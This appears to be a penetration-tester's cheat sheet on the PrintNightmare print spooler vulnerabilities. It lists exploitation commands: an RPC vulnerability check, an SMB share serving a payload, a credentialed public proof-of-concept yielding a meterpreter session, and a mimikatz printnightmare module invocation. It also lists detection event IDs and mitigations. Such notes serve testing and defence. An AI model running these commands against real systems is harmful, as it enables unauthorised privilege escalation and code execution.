Print Nightmare

• Privilege Escalation using Print Spooler Service
• Located at C:\Windows\System32\spoolsv.exe
• Enabled by default
• CVE-2021-1675 (locally exploitable) and CVE-2021-34527 (RCE) are both related to the print spooler
• RCE connection is done via DCE/RPC. Use of RpcAddPrinterDriver or RpcAddPrinterDriverEx

Usage

• Prepare reverse shell
• Check if target would be vulnerable

rpcdump.py @$TARGET_IP | grep -e 'MS-RPRN|MS-PAR'

• Execute smb server

smbserver.py share . -smb2support

• Execute PoC with credentials to elevate

python CVE-2021-1675.py <domain of domaincontroller>/<user>:<password>@$TARGET_IP

• Use the meterpreter session

Mimikatz

• Printnightmare modules of mimikatz

misc::printnightmare /target:<domain.com> /authuser:<lowpriv_user> /authpassword:<password> /library:\\<domain.com>\path\to\printnightmare.dll

IOCs

• pcAddPrinterDriverEx() is called
• Sygnia explains them

• Splunk queries

• Logs are Microsoft-Windows-PrintService/Admin and Microsoft-Windows-PrintService/Operational

• Event Ids 316, 808, 811, 31017, 7031

Mitigation

• link
• Stop and disable

Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled

• Disable group policy

Computer Configuration/Administrative Templates/Printers